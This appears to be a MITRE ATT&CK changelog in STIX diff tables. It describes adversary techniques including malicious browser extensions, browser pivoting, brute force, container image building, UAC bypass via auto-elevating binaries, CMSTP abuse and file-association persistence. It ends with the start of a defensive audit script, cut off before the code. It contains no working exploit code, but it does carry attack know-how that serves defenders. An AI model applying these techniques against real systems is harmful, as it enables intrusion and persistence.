Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
| external_references[1]['source_name'] | Wikipedia Browser Extension | Chrome Extension Crypto Miner |
| external_references[1]['description'] | Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018. | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Browser_extension | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ |
| external_references[2]['source_name'] | Chrome Extensions Definition | xorrior chrome extensions macOS |
| external_references[2]['description'] | Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017. | Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021. |
| external_references[2]['url'] | https://developer.chrome.com/extensions | https://www.xorrior.com/No-Place-Like-Chrome/ |
| external_references[3]['source_name'] | Malicious Chrome Extension Numbers | Chrome Extensions Definition |
| external_references[3]['description'] | Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017. | Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017. |
| external_references[3]['url'] | https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf | https://developer.chrome.com/extensions |
| external_references[4]['source_name'] | xorrior chrome extensions macOS | ICEBRG Chrome Extensions |
| external_references[4]['description'] | Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021. | De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018. |
| external_references[4]['url'] | https://www.xorrior.com/No-Place-Like-Chrome/ | https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses |
| external_references[5]['source_name'] | Chrome Extension Crypto Miner | Malicious Chrome Extension Numbers |
| external_references[5]['description'] | Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017. | Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017. |
| external_references[5]['url'] | https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/ | https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf |
| external_references[6]['source_name'] | ICEBRG Chrome Extensions | Chrome Extension C2 Malware |
| external_references[6]['description'] | De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018. | Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017. |
| external_references[6]['url'] | https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses | https://kjaer.io/extension-malware/ |
| external_references[7]['source_name'] | Banker Google Chrome Extension Steals Creds | Catch All Chrome Extension |
| external_references[7]['description'] | Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017. | Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017. |
| external_references[7]['url'] | https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ | https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) |
| external_references[8]['source_name'] | Catch All Chrome Extension | Banker Google Chrome Extension Steals Creds |
| external_references[8]['description'] | Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017. | Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017. |
| external_references[8]['url'] | https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/) | https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/ |
| external_references[10]['source_name'] | Chrome Extension C2 Malware | Wikipedia Browser Extension |
| external_references[10]['description'] | Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017. | Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018. |
| external_references[10]['url'] | https://kjaer.io/extension-malware/ | https://en.wikipedia.org/wiki/Browser_extension |
| x_mitre_data_sources[4] | File: File Creation | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.
Another example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:11:16.808000+00:00 | 2022-02-25 18:58:15.229000+00:00 |
| external_references[4]['url'] | https://cobaltstrike.com/downloads/csmanual38.pdf | https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Logon Session: Logon Session Creation |
| Description |
|---|
| Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-30 19:18:16.672000+00:00 | 2022-04-19 21:28:49.481000+00:00 |
| x_mitre_data_sources[0] | Command: Command Execution | User Account: User Account Authentication |
| x_mitre_data_sources[1] | User Account: User Account Authentication | Command: Command Execution |
| x_mitre_version | 2.3 | 2.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Mohamed Kmal | |
| x_mitre_platforms | Network |
| Description |
|---|
Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they then may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-26 16:45:04.924000+00:00 | 2022-04-01 13:04:00.946000+00:00 |
| x_mitre_data_sources[0] | Image: Image Creation | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Image: Image Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-22 21:36:52.458000+00:00 | 2022-04-19 15:11:20.036000+00:00 |
| description | Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) |
| external_references[1]['source_name'] | TechNet How UAC Works | Davidson Windows |
| external_references[1]['description'] | Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. | Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works | http://www.pretentiousname.com/misc/win7_uac_whitelist2.html |
| external_references[2]['source_name'] | TechNet Inside UAC | TechNet How UAC Works |
| external_references[2]['description'] | Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016. | Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. |
| external_references[2]['url'] | https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx | https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works |
| external_references[3]['source_name'] | MSDN COM Elevation | SANS UAC Bypass |
| external_references[3]['description'] | Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016. | Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. |
| external_references[3]['url'] | https://msdn.microsoft.com/en-us/library/ms679687.aspx | http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass |
| external_references[4]['source_name'] | Davidson Windows | MSDN COM Elevation |
| external_references[4]['description'] | Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014. | Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016. |
| external_references[4]['url'] | http://www.pretentiousname.com/misc/win7_uac_whitelist2.html | https://msdn.microsoft.com/en-us/library/ms679687.aspx |
| external_references[5]['source_name'] | Github UACMe | enigma0x3 Fileless UAC Bypass |
| external_references[5]['description'] | UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. | Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. |
| external_references[5]['url'] | https://github.com/hfiref0x/UACME | https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ |
| external_references[6]['source_name'] | enigma0x3 Fileless UAC Bypass | enigma0x3 sdclt app paths |
| external_references[6]['description'] | Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. | Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. |
| external_references[6]['url'] | https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ | https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ |
| external_references[7]['source_name'] | Fortinet Fareit | enigma0x3 sdclt bypass |
| external_references[7]['description'] | Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. | Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. |
| external_references[7]['url'] | https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware | https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ |
| external_references[8]['source_name'] | SANS UAC Bypass | TechNet Inside UAC |
| external_references[8]['description'] | Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. | Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016. |
| external_references[8]['url'] | http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass | https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx |
| external_references[9]['source_name'] | enigma0x3 sdclt app paths | Fortinet Fareit |
| external_references[9]['description'] | Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. | Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. |
| external_references[9]['url'] | https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ | https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware |
| external_references[10]['source_name'] | enigma0x3 sdclt bypass | Github UACMe |
| external_references[10]['description'] | Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. | UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. |
| external_references[10]['url'] | https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ | https://github.com/hfiref0x/UACME |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata |
| Old Description | New Description |
|---|---|
| Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. 
(Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:34:03.247000+00:00 | 2022-03-11 18:38:36.109000+00:00 |
| description | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) | Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. 
(Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Connection Creation |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example: * HKEY_CLASSES_ROOT\txtfile\shell\open\command * HKEY_CLASSES_ROOT\txtfile\shell\print\command * HKEY_CLASSES_ROOT\txtfile\shell\printto\command The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
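An added audit script, not part of the ATT&CK record above, that walks the HKEY_CLASSES_ROOT\.[extension] to [handler]\shell\[action]\command chain this description (and the same description repeated in the diff further down) lays out, and flags handler commands whose executable lies outside the Windows or Program Files trees, is missing from disk, or lacks a valid Authenticode signature. The function names and the default extension list are this example's own assumptions; it reads the merged HKCR view, so per-user UserChoice overrides under HKCU are not covered.

```powershell
# Added example, not from the ATT&CK record above: audit file-association handler
# commands (HKCR\.<ext> -> <handler> -> shell\<verb>\command) for persistence.
# Assumptions: Windows PowerShell 5.1 or PowerShell 7 with read access to HKCR;
# the function names and the default extension list are this example's own choices.
# Caveat: HKCR is the merged HKLM/HKCU Classes view; per-user UserChoice overrides
# under HKCU\...\FileExts take precedence for interactive launches and are not read here.

function Resolve-CommandExecutable {
    # Extract the executable from a shell command string such as
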